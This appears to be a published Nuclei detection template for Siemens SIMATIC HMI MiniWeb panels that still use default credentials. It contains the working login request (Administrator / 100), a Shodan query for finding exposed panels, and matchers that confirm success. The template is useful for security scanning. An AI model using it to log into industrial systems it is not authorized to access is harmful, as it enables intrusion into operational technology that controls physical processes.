Identified Siemens SIMATIC HMI MiniWeb interfaces that were accessible using default credentials.These interfaces are used to remotely monitor and control Human-Machine Interface (HMI) panels deployed in industrial environments. Leaving the default login in place posed a significant risk to operational technology (OT) systems.
PoC代码[已公开]
id: siemens-simatic-default-login
info:
name: Siemens SIMATIC HMI Miniweb - Default Login
author: biero-el-corridor
severity: high
description: |
Identified Siemens SIMATIC HMI MiniWeb interfaces that were accessible using default credentials.These interfaces are used to remotely monitor and control Human-Machine Interface (HMI) panels deployed in industrial environments. Leaving the default login in place posed a significant risk to operational technology (OT) systems.
metadata:
max-request: 1
verified: true
shodan-query: title:"Miniweb Start Page"
tags: ics,siemens,default-login,vuln
http:
- raw:
- |
POST /FormLogin HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Login=Administrator&Redirection=/Templates/Loginpage.html&Password=100
matchers-condition: and
matchers:
- type: word
part: response
words:
- 'siemens_ad_session='
- 'Auth Form Response'
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022046720def522cc848031fc3300c41b4dc6a2ab8e9063ffcb451a7e932611f3ee6022100cd0b0bff11e21f70fc44ffc47a5fc05670d0a9b968f8fedfb39cd5eb9618d37e:922c64590222798bb761d5b6d8e72950